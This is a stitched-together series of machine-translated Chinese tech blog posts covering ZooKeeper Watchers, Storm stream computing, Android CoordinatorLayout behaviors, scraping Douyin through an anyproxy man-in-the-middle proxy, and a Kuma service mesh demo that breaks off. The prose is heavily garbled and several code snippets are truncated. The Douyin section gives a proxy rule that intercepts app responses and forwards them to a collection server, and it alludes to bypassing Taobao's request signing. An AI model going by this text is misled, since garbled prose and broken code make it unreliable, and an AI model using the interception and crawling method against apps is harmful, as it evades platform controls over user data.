The principle and ZK Watcher

What is ZK Watcher

Based on a common demand for ZK applications is the need to know the state of ZK collection. For this purpose, a method is polling ZK ZK client set the timing to check if the system status has changed. However, polling is not an efficient way, particularly in the frequency state change when the low

Thus, ZK provided a poll to avoid performance problems caused by a particular time of interest notification client mode, i.e. provided Watcher manner. By setting Watcher, ZK client can request a notification to the specified znode registration, receive notification when a single znode changes. For example, the deleted Watcher sending node to be deleted when znode notice

ZK Watcher application code typically follows the following framework

zk.exists("myZnode", myWatcher, existsCallback, null);

Watcher myWatcher new Watcher() {
  public void process(WatchedEvent event) {
    // process the watch event

StatCallback existsCallback = new StatCallback() {
  public void processResult(int rc, String path, Object ctx, Stat stat) {
    // process the result of the exists call

The above code framework exists to operate, for example, shows the general use of asynchronous call ZK and register the Watcher

Classification of WatchedEvent

Watcher use an important element is to understand how and when to set Watcher trigger, not all operations can be set ZK Watcher, Watcher is not all events will be triggered

Despite the connection status of being overloaded WatchedEvent, WatchedEvent course of business will be divided into the following encounter

    NodeCreated – can be set by calling exists Watcher, is triggered when znode created from scratch

    NodeDeleted – Watcher can be set by calling getData exists or is triggered when znode be deleted

    NodeDataChanged – Watcher can be set by calling getData exists or is triggered when data changes in znode

    NodeChildrenChanged – trigger can be called to set Watcher by getChildren, created or deleted in direct child of znode

    DataWatchRemoved – trigger corresponding Watcher Watcher exists or when getData set are deleted

    ChildWatchRemoved – Watcher in the corresponding trigger setting is deleted Watcher getChildren

We can see that only exists and getData and getChildren three operations to set Watcher

Note, Watcher created getData not receive NodeCreated event, because when getData node does not exist KeeperException.NoNodeException will throw an exception, but does not set Watcher

Watcher mechanisms of implementation and life cycle

From the perspective of the application is concerned, after completing registration Watcher can just wait event is triggered, ZK is how to achieve this process without concern. But ZK understand the specific implementation mechanism will help us better understand the source of the problem and targeted troubleshooting problems in the face of error or anomaly

The most important issue is the mechanism to achieve Watcher Watcher exactly where registered, as well as exactly how Watcher triggered. It is difficult to separate the two issues to explain, so the following will be analyzed together

Originally part explain the principle of the best is a combination of the source code corresponding summary to explain, but ZK it is difficult to read the source code, posted here not only fail to help understand, I am afraid that will make the reader more confused. I will introduce the source file location corresponding to the code logic together with the size of the pseudo-code, interested students can read on their own, to enjoy good health

Watcher mechanisms to achieve from the registration talk, ZK client at the time of execution exists or getData or getChildren operation, you can set a custom Watcher reuse or create Watcher set when the client through the flag. The latter practice is rarely used, do not do too much introduction. The Watcher is packaged into the Packet into ClientCnxn EventThread, the registered client’s Watches set when the corresponding operation is completed. In the server, a request corresponding to a GetDataRequest like In Flag is set up, the server Watcher thereby determines whether to set the appropriate Watcher. Here, ZK is ServerCnxn achieved Watcher interface. ServerCnxn each service end is connected to the object for the client, its process (WatchedEvent) corresponding WatchedEvent approach is packaged and sent to the customer terminal WatcherEvent

When the state change after successful Watcher Watcher settings need to be concerned about is triggered, in essence, is a collection Watcher in ZK occur in the client callbacks processing logic. But the change of state occurs ZK collection to prevail in the state of the server, the server maintains state ZK collection, which is mainly composed of ZKDatabase and DataTree to achieve. When the server has occurred is determined when the required starting Watcher state change, the server will traverse the corresponding node changes the Watcher, this is the corresponding client connections thereof callback process (WatchedEvent) method. As described above, this is transmitted to a corresponding client WatchedEvent

Watcher registered for and triggered the process described above actually encompasses the entire life cycle Watcher, that Watcher’s life cycle starting from the corresponding operating successfully in the customer service side, to the rear end of the trigger. In other words, Watcher one-shot, and would like to listen again to the corresponding node status needs to be reset after triggering Watcher. Watcher of the end of life there is another trigger condition that the session is closed or expired. Further, in later versions 3.5.0, ZK removeWatches operation can be performed to remove the active node is no longer of interest.

Watcher error handling

As described above, Watcher is a corresponding change notification mechanism of a lightweight. Because of its simple function, in practical application to build more complex semantics, we need to do in response to the corresponding discussion of the Watcher in some fault conditions.

The first of which is the problem caused by the one-shot and information WatchedEvent carry. Because Watcher one-shot, so we might lose an event before a Watcher Watcher reset after the previous trigger to the rear. Normally this is not a problem, because ZK’s goal is to achieve consensus on the state of storage under a distributed environment, rather than to ensure that each client events are recorded and processed. Watcher that comes with re-setting the action is sufficient to ensure that we sync with the latest state at the time. Therefore, although we missed the event, but that is at best only an intermediate state guarantee provided by ZK is a final state on a period of time. But from another perspective, because the WatchedEvent contains only the incident occurred] [this information, so any new state will need to obtain from the ZK collection, which is simple to achieve ZK in a trade-off had to do

The second of which is about CONNECTIONLOSS exception. Strictly speaking this is not something to be concerned about the Watcher, because the operation failed due to CONNECTIONLOSS Watcher is unable to successfully set up. CONNECTIONLOSS abnormal means that the client and the server you are connecting disconnected due ZK server has several servers, in which case the client will attempt to connect to other servers. However, in this case, since the Watcher is not set up successfully, so after a successful reconnection, you should retry the operation just to the correct settings Watcher. In addition, Watcher had already successfully set will not be affected by such movement of the connection, because the client reconnection service will end when all Watcher resend it again, the server than the relative value of znode state and zxid of inferred Watcher required to trigger the trigger, the other normal setting Watcher


ZK Watcher mechanism of the normal process is quite smooth, but after triggering the need for active Watcher got me to state once again that it is quite troublesome, and ZK operation will be a variety of strange anomalies. About ZK deal with various exceptions in the case of network delay or partition, there will be a separate article to introduce. In addition, ZK’s source code harmful to the body, it is recommended in addition to the symptoms it is best not nothing to see


Explore flow calculated

First, static data and streaming data

Static data: In order to support decision analysis and construction of data warehouse system, in which a large amount of historical data that is stored in the static data.

Data stream: data to large, rapid, continuous flow in the form of time-varying arrival. (Example: real-time generated logs the user real-time trading information)

Data stream has the following characteristics:

(1), the data continue to arrive quickly, the potential size may be endless. (2), a number of data sources, the complex format. (3) large amount of data, but not very concerned about the store, once processed, or discarded, either archive storage (stored in the data warehouse). (4), focusing on the overall value of the data, not overly concerned about the individual data. (5), the data in reverse order, or incomplete, the system can not control the new sequence data elements to be processed arrives.

In the conventional data processing flow, always first collect data and then places the data in the DB. Then the processed data DB.

Flow calculation: In order to achieve the timeliness of data, real-time consumption data acquisition.

Second, the bulk flow calculation and calculation

Bulk is calculated: static data sufficient time to process, such as Hadoop. Less demanding real-time.

Flow Calculation: mass data acquired in real time from various data sources, real-time analysis after treatment to obtain valuable information (real-time, multi-data structure, mass).

Stream Computing adhering to a basic idea that the value of data over time lowered, such as user clickstream. Therefore, when an event occurs it should be treated immediately instead of cached batch processing. Complex format data stream, a number of sources, a huge amount of data, is not suitable for computing quantities, must be calculated in real time, the response time is several seconds, real-time requirements. Batch throughput computing concern, interest is calculated real-time stream.

Flow calculation features:

1, real-time (realtime) and unbounded (unbounded) data stream. Flow calculation is calculated in real time and face streaming, the stream flow data is calculated subscription and consumption takes place in chronological order. And due to continuous, long and continuous data flow occurs into the integrated data flow computing system. For example, access to the site click on the log stream, as long as it does not close the site click on the log stream has been kept and the traffic generated computing system. Therefore, for the flow system, the data is not real-time termination (unbounded) of.

2, continuous (Continuos) and computationally efficient. Stream computing is a “trigger event” computing model, trigger source is above the unbounded streaming data. Once a new data stream into the stream computing, stream computing and immediately initiate a computing tasks, so that the entire stream computing is ongoing.

3, and real-time data stream (Streaming) integration. Triggering a data stream flow calculation results can be written directly to the data storage purposes, for example, report data is written directly to an RDS calculating reports show. Thus the calculation result as the streaming data can be continuously written stream data similar data storage purposes.

Third, the calculated flow frame

In order to timely processing of streaming data, it requires a low delay, scalable, highly reliable processing engine. For a flow computing system, it should meet the following requirements:

  • High performance: the basic requirements of large data, such as processing hundreds of thousands of data per second.
  • Massive formula: TB-level support and even the size of PB-level data.
  • Real-time: to ensure low latency time to achieve the second level, or even milliseconds.
  • Distributed: support large data base architecture must be able to smooth extension.
  • Ease of use: to quickly develop and deploy.
  • Reliability: stream data reliably.

There are three common framework and stream computing platforms: commercial-grade stream computing platform, open source stream computing framework, stream computing framework to support the company’s business development itself.

(1) Commercial grade: InfoSphere Streams (IBM) and StreamBase (IBM).

(2) Origin calculation opening frame, represent the following: Storm (Twitter), S4 (Yahoo).

(3) computing framework to support the company’s own business development stream: Puma (Facebook), Dstream (Baidu), Galaxy stream data processing platform (Taobao).

Fourth, the flow computing framework Storm

Twitter Storm is an open source distributed real-time big data processing framework, with the increasingly widespread application of stream computing, Storm visibility and increasing role. Next comes the core components of Storm and performance comparison.

Storm core components

  • Nimbus: That’s Storm Master, responsible for resource allocation and task scheduling. A Storm cluster is only a Nimbus.
  • Supervisor: namely Storm’s Slave, is responsible for receiving Nimbus task assigned to manage all Worker, a Worker Supervisor node contains multiple processes.
  • Worker: work processes, each worker process has multiple Task.
  • Task: tasks, each Spout and Bolt by a number of tasks (tasks) performed in Storm cluster. Each task corresponds to a thread of execution.
  • Topology: computing topology, Storm topology is a package for real-time computing application logic, its role and MapReduce tasks (Job) is very similar, except that a MapReduce Job After getting the end result will always, and will always be a cluster topology run until you manually to terminate it. Topology may also be understood as a series of topology data flows (Stream Grouping) and Bolt interrelated consisting of Spout.
  • Stream: data stream (Streams) is Storm in the core abstraction. It refers to a data stream created in parallel in a distributed environment, a set of tuples (tuple) processed unbounded sequence. Data stream may be capable of the expression pattern of one domain data stream of tuples (Fields) is defined.
  • Spout: a data source (a Spout) is the source of the data stream topology. Spout tuple typically reads data from an external source and then sends them to the topology. According to different needs, it may be defined as a Spout reliable data sources, may be defined as the unreliable data sources. A reliable Spout able to re-send the tuple in the tuple it sends the process fails to ensure that all tuples can get the right treatment; corresponding to unreliable Spout will not be sent to after-tuple tuple any other processing. Spout can transmit a plurality of data streams.
  • Bolt: topology data processing are all done by the Bolt. Data by filtering (filtering), the processing function (functions), the polymerization (aggregations), the coupling (joins), database interaction functions, Bolt can be virtually any kind of data needs to complete. Bolt can be a simple data stream conversion, and more complex data stream into a plurality of Bolt and typically require the use of multiple steps to complete.
  • Stream grouping: To determine the topology of the input data stream each Bolt important part is to define a topology. Defines a packet stream partitioned manner in the data flow of Bolt different tasks (Tasks) in. There are eight built-in data stream are grouped in the Storm.
  • Reliability: Reliability. Storm can be ensured by the topology of each tuple can send handled correctly. By tracking each tuple emitted from Spout whether the tuple consisting of the tree can be determined tuple has completed processing. Each topology has a “message delay” parameter, whether a tuple if Storm processing is completed, it will process the tuple is marked as failed, and re-transmitted at a later time in the tuple is not detected within the delay time .

(FIG. 1: Storm core components)

(FIG. 2: Storm programming model)

Contrast mainstream computing engine

The more popular real-time processing engines Storm, Spark Streaming, Flink. Each engine has its own characteristics and application scenarios. The following table is a simple comparison of these three engines.

(FIG. 3: Performance Comparison main engine)

Summary: The emergence of stream computing expands our ability to deal with complex real-time computing needs. Storm as a flow calculation tool, which greatly facilitated our application. Flow calculation engine still evolving, has greatly improved JStorm, Blink-peer computing engine based Storm Flink and development in all aspects of performance. Stream Computing worthy of our continued attention.












Author: Yao Yuan

Source: CreditEase Institute of Technology


Custom behavior – perfect imitation QQ browser home page, the US group business details page

Use CoordinatorLayout create a variety of cool effects

Custom Behavior – imitation almost known, FloatActionButton hiding and showing

NestedScrolling mechanism Insights

Step by step take you read CoordinatorLayout source

Custom Behavior – Imitation Sina microblogging found to achieve page

ViewPager, ScrollView nested ViewPager slide conflict resolution

Custom behavior – perfect imitation QQ browser home page, the US group business details page


I remember two years ago when the custom behavior has written articles Custom Behavior – Imitation Sina microblogging found to achieve page, and now there are almost more than ten thousand of the amount of reading it.

Today, the upgrade behavior, behavior with respect to two years ago, adds the following features

    Cascade callback listener increases during the sliding, the sliding distance of outer convenient, corresponding animation, show cool the UI, provided by a callback listener setPagerStateListener

    To the top of the slide when the slide is able to be provided to slide down Head, method setCouldScroollOpen

    Finger sliding header portion of inertia when the increase fling callback, according to need, whether part of the slide list content, method setOnHeaderFlingListener

    HeaderBehavior, ContentBehavior code optimization, business logic peeled apart to facilitate reuse.

Instructions for use


We first look at Sina Weibo found that the effect of the page:

Next we look at two years ago, we modeled the effect of Sina Weibo implemented in view

Imitation QQ browser

Imitation US group business details page:

Analysis shows:

There are two states, open and close state.

    It refers to the open state when the Tab + ViewPager yet when slid to the top, header has not been completely removed screen

    Tab + ViewPager close sliding state refers to when the top, Header when the screen is removed

From the renderings, we can see that in the open state, we slide up ViewPager inside RecyclerView time, RecyclerView does not move up (RecyclerView slip event to the outside of the container processing, it has been all consumed a), and the entire layout (refer Header + Tab + ViewPager) will be shifted upward. When Tab to the top of the slide, we slide up ViewPager inside RecyclerView when RecyclerView can slide up properly, that at this time no interceptions slip events outside of the container.

At the same time we can see in the open state, we do not support the drop-down refresh, this is easier to implement, monitor status page, if the state is open, we SwipeRefreshLayout setEnabled set to false, so as not to intercept the event, close the page when SwipeRefreshLayout setEnabled set to TRUE, so you can refresh the drop-down support.

Based on the above analysis, we can put this whole effect divided into three parts

Header portion of the first portion: the Header portion has not slid to the top of the time (i.e., open time), followed swipe
    The second part Content part: when we slip up, when the Header in the open state, this time sliding up Header, recyclerView content will not be part of the slide, when the header is in close state, content portion of the slide up, slide up RecyclerView. When we slide down, header and not with the sliding, sliding recyclerView content only part of
    The third part of the search part: when we slip up, Search with the sliding part will ultimately remain in a fixed position.

We define the relationship between these three parts is dependent on the Content Header. Header when moving, Content followed the move. So when we deal with the sliding events, just to properly handle the Behavior Header section of the oK, Behavior Content section of the need to deal slip event, just depends on the Header, you can follow the movement accordingly. behavior Search section need not be processed slip event, and simply rely Header, moving along accordingly.

As for how to achieve specific, you can see the custom Behavior – Imitation Sina microblogging found to achieve page, the core idea is similar to not repeat here.

Instructions for use

Here we have like QQ browser demo explained:

Together we look at how to use: simply, just two steps:

    The first step, respectively, in the xml file for the header part, content specified part of our corresponding behavior

    A second portion disposed inside the code number of configuration parameters

The first step: writing xml file, and specify the appropriate behavior














Step Two: dynamically set some parameters in the code which

private void initBehavior() {
    Resources resources = DemoApplication.getAppContext().getResources();
    mHeaderBehavior = (QQBrowserHeaderBehavior) ((CoordinatorLayout.LayoutParams) findViewById(;
    mHeaderBehavior.setPagerStateListener(new QQBrowserHeaderBehavior.OnPagerStateListener() {
        public void onPagerClosed() {
            if (BuildConfig.DEBUG) {
                Log.d(TAG, "onPagerClosed: ");
            Snackbar.make(mNewsPager, "pager closed", Snackbar.LENGTH_SHORT).show();
            setViewPagerScrollEnable(mNewsPager, true);

        public void onScrollChange(boolean isUp, int dy, int type) {


        public void onPagerOpened() {
            Snackbar.make(mNewsPager, "pager opened", Snackbar.LENGTH_SHORT).show();
    // 设置为 header height 的相反数
    // 设置 header close 的时候是否能够通过滑动打开
    mContentBehavior = (QQBrowserContentBehavior) ((CoordinatorLayout.LayoutParams) findViewById(;
    // 设置依赖于哪一个 id,这里要设置为 Header layout id
    // 设置 content 部分最终停留的位置

mHeaderBehavior.setHeaderOffsetRange disposed offset Header section, we achieved by translationY, we generally set to the opposite of the height of the header.
    mHeaderBehavior.setCouldScroollOpen (false), if the time set header close can be opened by sliding.

mContentBehavior.setDependsLayoutId (; depending on which is provided a id, set here to Header layout id. mContentBehavior.setFinalY part of the final set position content to stay.

We look OnPagerStateListener callback

 * callback for HeaderPager 's state
public interface OnPagerStateListener {
     * do callback when pager closed
    void onPagerClosed();

     * when scrooll, it would call back
     * @param isUp  isScroollUp
     * @param dy   child.getTanslationY
     * @param type touch or not touch, TYPE_TOUCH, TYPE_NON_TOUCH
    void onScrollChange(boolean isUp, int dy, @ViewCompat.NestedScrollType int type);

     * do callback when pager opened
    void onPagerOpened();

There are three main methods, the first method, onPagerClosed Close the time when the header will callback, the second method, when the header slide distance change will onScrollChange callback method. It has three parameters, whether isUp representatives are slid upward, dy denotes an offset of the header, is a type representative of the type of touch or non-touch (i.e., sliding fling)

If you want to do some cool effects, you can onScrollChange method, according to the sliding distance of each different View animation accordingly.

Imitation Mito business details page

Step with the above steps like QQ browser is the same, the same steps are not repeated here, said several key points:
    First: in the page header close, we can open by sliding header, this is done by calling mHeaderBehavior.setCouldScroollOpen (true); to achieve.
    Second: sliding header, fling, they can see recyclerView content is also part of the slide, we are through fling the event header do, slide the manual call RecyclerView of smoothScrollBy onFlingStart time.

mHeaderBehavior.setOnHeaderFlingListener(new HeaderFlingRunnable.OnHeaderFlingListener() {
    public void onFlingFinish() {


    public void onFlingStart(View child, View target, float velocityX, float velocityY) {
        Log.i(TAG, "onFlingStart: velocityY =" + velocityY);
        if (velocityY < 0) {
            mRecyclerView.smoothScrollBy(0, (int) Math.abs(velocityY), new AccelerateDecelerateInterpolator());


    public void onHeaderClose() {


    public void onHeaderOpen() {


Encountered pit

header section can not respond to slip events

We are a custom NestedLinearLayout, rewrite its onTouchEvent event, the event delivery mechanism by NestedScrolling to NestedScrollingParent, namely CoordinatorLayout, and will give NestedScrollingParent child View of behavior for processing.

public boolean onTouchEvent(MotionEvent event) {
    final int action = MotionEventCompat.getActionMasked(event);
    switch (action) {
        case MotionEvent.ACTION_DOWN:
                    | ViewCompat.SCROLL_AXIS_VERTICAL);

        case MotionEvent.ACTION_MOVE:
            int dy = (int) (event.getRawY() - lastY);
            lastY = (int) event.getRawY();
            //  dy < 0 上滑, dy>0 下拉
            if (dy < 0) { // 上滑的时候交给父类去处理
                if (startNestedScroll(ViewCompat.SCROLL_AXIS_VERTICAL) // 如果找到了支持嵌套滚动的父类
                        && dispatchNestedPreScroll(0, -dy, consumed, offset)) {//
                    // 父类进行了一部分滚动

            } else {
                if (startNestedScroll(ViewCompat.SCROLL_AXIS_VERTICAL) // 如果找到了支持嵌套滚动的父类
                        && dispatchNestedScroll(0, 0, 0, -dy, offset)) {//
                    // 父类进行了一部分滚动

        case MotionEvent.ACTION_CANCEL:
        case MotionEvent.ACTION_UP:

    return super.onTouchEvent(event);

When we set up a click event to the child View header when not slide header

Android has some understanding of the event distribution mechanism, all know, the Android, the default event delivery mechanism like this,

When TouchEvent occurs, the first Activity TouchEvent passed to the topmost View, TouchEvent dispatchTouchEvent first reaches the top level view, and then distributed by dispatchTouchEvent method.

    Returns true if dispatchTouchEvent consumer event, the end of the event.

  • If dispatchTouchEvent returns false, then passed back to the parent View onTouchEvent event processing;

    OnTouchEvent event returns true, the event ended, it returns false, to the parent View of OnTouchEvent processing method

  • If dispatchTouchEvent return to super, the default method is invoked their onInterceptTouchEvent

    By default interceptTouchEvent call back method super, super default method returns false, it will be handed over to child View onDispatchTouchEvent method of treatment
                If interceptTouchEvent returns true, which is intercepted off, then handed it to deal with the onTouchEvent
                If interceptTouchEvent returns false, then passed to the child view, the view from the dispatchTouchEvent child again began distributing this event.

So when we set up a sub-View click event, because of the default parent does not intercept events, will come onToucheEvent child View events in, since the click event, the event is consumed, they will not callback in the parent View onTouchEvent the ACTION_MOVE event.

The solution: rewrite onInterceptToucheEvent event NestedLinearLayout of when is ACTION_MOVE event returns true, interception, it will call its own onTouchEvent event, to ensure you can slide.

public boolean onInterceptTouchEvent(MotionEvent event) {
    switch (event.getAction()) {
        case MotionEvent.ACTION_DOWN:
            mDownY = (int) event.getRawY();
            // 当开始滑动的时候,告诉父view
                    | ViewCompat.SCROLL_AXIS_VERTICAL);
        case MotionEvent.ACTION_MOVE:
            // 确保不消耗 ACTION_DOWN 事件
            if (Math.abs(event.getRawY() - mDownY) > mScaledTouchSlop) {
                logD("onInterceptTouchEvent: ACTION_MOVE  mScaledTouchSlop =" + mScaledTouchSlop);
                return true;
    return super.onInterceptTouchEvent(event);

But here there is a pit, a normal click event will trigger ACTION_DOWN, ACTION_MOVE, ACTION_UP, returns true if we directly ACTION_MOVE which will result in a sub-View event onClick failure.


final ViewConfiguration configuration = ViewConfiguration.get(getContext());
mScaledTouchSlop = configuration.getScaledTouchSlop();
if (Math.abs(event.getRawY() - mDownY) > mScaledTouchSlop) {
    return true;

About slide conflict resolution, you can read my previous blog post: ViewPager, ScrollView nested ViewPager slide conflict resolution

How to determine the header is fling action

We are here to do through gestures processor GestureDetector, of course, you can also be calculated by VelocityTracker, but more complicated

public boolean onTouchEvent(MotionEvent event) {

        GestureDetector.OnGestureListener onGestureListener = new GestureDetector.OnGestureListener() {

            public boolean onDown(MotionEvent e) {
                return false;

            -----// 省略若干代码

            public boolean onFling(MotionEvent e1, MotionEvent e2, float velocityX, float velocityY) {
                Log.d(TAG, "onFling: velocityY =" + velocityY);
//                fling((int) velocityY);
                getScrollingChildHelper().dispatchNestedPreFling(velocityX, velocityY);
                return false;

        mGestureDetector = new GestureDetector(getContext(), onGestureListener);


Sometimes, I make some notes is really quite important.

This time writing this blog post, because to do a similar effect in the project. At first, nothing really thinking. But clearly we have to remember that two years ago, wrote a similar article, the specific implementation principle has long been forgotten. Two years ago I looked at the blog, organize his thoughts, the code will be moved to the project, we found some pit. Tinkering, the pits are filled.

Imagine if the principle had not been recorded, the effect is really quite hard to achieve. If you Coordinatorlayout, behavior, NestedScroll these mechanisms are not familiar with, you simply can not achieve. Two years ago to write a custom Behavior - when imitation Weibo pages found to achieve this blog, private letter received a lot of feedback saying that they do have some effect did this over two weeks still can not be achieved, I am very grateful write this blog. Therefore, from now on, try a do my notes. Really, a good memory as bad written.

The second point is deeper feelings, beginning, I read the code I wrote two years ago, I started a reaction, I went to, what is this garbage code. Indeed, in many places that quite bad, behavior coupled business logic, is difficult to reuse, not good maintenance. So this time, I pulled out the behavior in his spare time out, they wanted to achieve a similar effect, easy, biu biu biu.

So much, are summarized below

    The notes do not meet, particularly with regard to the principle of

    The code must be awe, not much to say, take his insight

    Keep a humble heart


Feel the results were good, we can focus on my hands sweep the micro-channel public number, or to my github top star, thank you


Vibrato data fetch and the data behind Taobao

Background analysis

As of July this year, vibrato Nikkatsu has exceeded 320 million. Vibrato president Zhang Nan predicts that by 2020, the total number of users Nikkatsu domestic short video industry will reach 10 billion. Vibrato launch multi-cash way, to make 10 million creators make money, vibrato say to make this 10 million creators make money, there are many ways in which cash, I want to share today is behind vibrato Taobao process chain, we brush vibrato video, we’ll find some video in the promotion of Taobao goods, is one of the channel creators realized from Taobao shop perspective, the vibrato of people to help their promotion of goods, need to pay up to people a certain advertising costs; from Taobao point of view, Taobao has a platform Taobao Alliance called every help Taobao to sell goods person, Taobao Alliance will define it as Taobao customers, as long as Taobao customers to promote goods was purchase, then the league will be paid to Taobao Taobao off a certain percentage of commission. In short, vibrato income of people has two parts: Taobao business advertising + (under the premise of a successful transaction) commission Taobao Alliance. This paper analyzes the vibrato to reach people posting process between Taobao.


Vibrato Posts





Post text


We can see the bottom left corner there is a shopping cart marked. Yes, he is the link Taobao goods, click to open the following





This is someone who posts to promote merchandise, click to jump Taobao APP

In summary, we can crawl up a list of people behind the product data to analyze the data, so you can get the data corresponding to the Taobao shop.


Vibrato APP packet capture


Vibrato version8.0.0 version of this iphone used, anyproxy as a proxy packet capture tool

anyproxy is an excellent proxy wheels Alibaba development, of course, there is a foreign mitmproxy

anyproxy installation guide can refer to:

anyproxy official link: seemingly needs a stable international environment before they can access the network

anyproxy project Address:


We can use anyproxy and mitmproxy to capture as an analytical tool, and

anyproxy is based nodeJs development (recommended people use familiar nodeJs)

mitmproxy is based on the development of python (python person familiar with the recommended use)

Using this two main tools that can be done to intercept and forward data, both of which are using the arrival of the man in the middle attacks the principle behind the development of our reptiles are also using this principle. Of course, the mere doing data analysis, you can use a common packet capture tool fidder charles and so on.

Installed anyproxy requires the phone to set up a trust certificate and agents

Proxy settings, anyproxy use the default port 8001 as a proxy port



Proxy settings





Setting up a trust certificate



The phone is open vibrato APP them a list of people post




Daren post a list of page


Computer open: http: // localhost: 8002 / can see all the data flowing through the mobile phone, which of course also includes data vibrato APP can see the vibrato of people post links.

Do some URL filtering conditions: https: //





Each field can see a post has simple_promotions by this analysis, this field is carrying information to promote the goods, we can put this ID to save data, and then to get the information to other Taobao shop merchandise according to ID






anyproxy default proxy intercepts and forwarding settings




Explain here, the default execution anyproxy -i in the terminal, anyproxy will automatically load the file in /usr/local/lib/node_modules/anyproxy/lib/rule_default.js, we need to intercept data vibrato, we need its sibling Create a directory douyin.js file to perform anuproxy -i douyin.js, then anyproxy do forwarded to intercept operation according to douyin.js inside logic. The default location of this file mac, the default file location window of its own global search rule_default.js which can be found

Douyin.js specific file code is as follows


  1 'use strict';
  3 module.exports = {
  5   summary: 'the default rule for AnyProxy',
  7   /**
  8    *
  9    *
 10    * @param {object} requestDetail
 11    * @param {string} requestDetail.protocol
 12    * @param {object} requestDetail.requestOptions
 13    * @param {object} requestDetail.requestData
 14    * @param {object} requestDetail.response
 15    * @param {number} requestDetail.response.statusCode
 16    * @param {object} requestDetail.response.header
 17    * @param {buffer} requestDetail.response.body
 18    * @returns
 19    */
 20   *beforeSendRequest(requestDetail) {
 21     console.log('this is request')
 22     return null;
 23   },
 26   /**
 27    *
 28    * 设置截取抖音的数据 
 29    * @param {object} requestDetail
 30    * @param {object} responseDetail
 31    */
 32   *beforeSendResponse(requestDetail, responseDetail) {
 33       if (requestDetail.url.indexOf('') >= 0) {    //抖音达人的详细信息app端
 34           const newResponse = responseDetail.response;
 35           newResponse.body = newResponse.body.toString();          
 36           const posturl="/WebCrawler/douyin/AppUserData"
 37           HttpPost(newResponse.body,requestDetail.url,posturl)
 38           console.log('传送app端达人的详细信息')
 40       }
 44     return null;
 45   },
 48   /**
 49    * default to return null
 50    * the user MUST return a boolean when they do implement the interface in rule
 51    *
 52    * @param {any} requestDetail
 53    * @returns
 54    */
 55   *beforeDealHttpsRequest(requestDetail) {
 56     return null;
 57   },
 59   /**
 60    *
 61    *
 62    * @param {any} requestDetail
 63    * @param {any} error
 64    * @returns
 65    */
 66   *onError(requestDetail, error) {
 67     return null;
 68   },
 71   /**
 72    *
 73    *
 74    * @param {any} requestDetail
 75    * @param {any} error
 76    * @returns
 77    */
 78   *onConnectError(requestDetail, error) {
 79     return null;
 80   },
 83   /**
 84    *
 85    *
 86    * @param {any} requestDetail
 87    * @param {any} error
 88    * @returns
 89    */
 90   *onClientSocketError(requestDetail, error) {
 91     return null;
 92   },
 93 };
 96 //传输数据到本地自己的服务器进行入库存储的操作
 97 function HttpPost(json,url,path) {//将json发送到服务器,str为json内容,url为历史消息页面地址,path是接收程序的路径和文件名
 98     console.log("开始执行转发操作");
 99     try{
100     var http = require('http');
101     var data = {
102         json: json,
103         url: encodeURIComponent(url),
104         data:'Im jiehuhu'
105     };
106     data = require('querystring').stringify(data);
107     var options = {
108         method: "POST",
109         host: "",//注意没有http://,这是服务器的域名。
110         port: 8080,
111         path: path,//接收程序的路径和文件名
112         headers: {
113             'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
114             "Content-Length": data.length
115         }
116     };
117     var req = http.request(options, function (res) {
118         res.setEncoding('utf8');
119         res.on('data', function (chunk) {
120             console.log('BODY: ' + chunk);
121         });
122     });
123     req.on('error', function (e) {
124         console.log('problem with request: ' + e.message);
125     });
127     req.write(data);
128     req.end();
129     }catch(e){
130         console.log("错误信息:"+e);
131     }
133     console.log("转发操作结束"+req);
134 }




The back end has a specific project to receive anyproxy forward to intercept data, I use this name javaWeb project called WebCrawler project to handle requests

APP vibrato data acquisition flowchart substantially as follows:



Here is the java + tomcat8 + mysql technical framework, which is the technology stack me a year ago, of course, now I am more like a mongoDB and Python, faster processing time up

Python + mongoDb may also be used to process the data transmitted from anyproxy



Specific part of automated operations temporarily not complete, you can use the phone or automated testing tools Appium QuickMacro

Data results are as follows: the portion of the data vibrato






Taobao shop to get the data according to the ID of goods






According to Taobao ID information to obtain goods Taobao shop is also a need to develop a new reptile. Here without too much explanation, or a little more difficult, goods need to get to know the key reptiles Taobao signature mechanism

Taobao H5 signature mechanism, interest research yourself slowly. . . . Anyway, I studied out ha ha ha ha


Specific data I climb down on the Baidu cloud at the following link: Interested can look at


Link: https: // Password: 1abc


These are the vibrato data fetch process, and the process to Taobao extending substantially ideas

    Vibrato vibrato APP to get up to people of all posts by anyproxy

    ID post inside the analysis of the promotion of goods, to obtain relevant information based on the ID merchandise shop

    Analysis of a person in the end in which products to promote, and that some shops in cooperation.

    Crawl through large-scale data analysis, you can analyze those shops do large-scale promotion in vibrato

About cries: will point crawlers, will point backend, will point front end, will point data analysis, will point algorithm, a like Eason Chan ?

here can contact me




This article original author, I play a word out, trained, trained, For reprint please indicate the original link

The purpose of this study is only a crawler technology, if someone illegally manipulating the use of the techniques described herein are the consequences of the operator themselves, and this article and the author does not have any relationship.



Use Bookinfo application testing Kuma Service Grid

Recently, open source API management platform Kong service suppliers recently released a new open source project Kuma. This article attempts to bookinfo Kuma grid application deployment in order to help you better understand Kuma project.


Kuma is a common control platform can be used to manage network services (Service Mesh) through seamless network traffic management layer 4-7, micro-services and the API, to solve the technical limitations of the first generation network.


Kuma emphasize its ease of use, to ensure the safety and observability of the underlying network, and even if it provides advanced simple control interface, but users can still perform more advanced configurations. Kuma rapid data collection platform and advanced control platform, allowing users using a simple command, you can set permissions, open indicators and configure routing rules.



In addition, Kuma software-defined security, enable mTLS for all Layer 4 traffic and provide traffic control high-definition, enhanced Layer 4 routing features, but Kuma can quickly achieve tracking and logging capabilities, allowing users to analyze indicators error investigation. Kuma can execute on any platform, including Kubernetes, virtual machines, containers, bare metal and traditional environments, so that the entire organization can practice a native cloud applications.


Kuma use of open-source projects Envoy was developed, and the Envoy is designed for native cloud application proxy, the official noted, Envoy is already the edge of the agency’s standard, along with the service network, has become an important realization native cloud system, because for the large-scale micro-service applications, monitoring, security, and reliability is all the more important.


  • Use the code in this article can be found ( at Github.





First, use the following command to configure the control plane, here it is the creation of a new Mesh named bookinfo in the control plane.


The following picture Bookinfo architecture application, which contains productpage, reviews, details, ratings and other services 4, service providing additional reviews three versions. In this test, we deploy one instance for each version.




In the data plane, in order to deploy all six instances of a server, in order to avoid this conflict, it is necessary to consider a reasonable distribution of inbound and outbound ports for each example, as shown below.


One thing to note, kuma-v0.1.2 version does not support deploying multiple Sidecar on the same host, but the latest master branch has been modified, so kuma-related command-line program used later in this article are the master branch the new compilation out.


Run the following command to configure ratings-v1 service.


Run the following command to configure the details-v1 service.


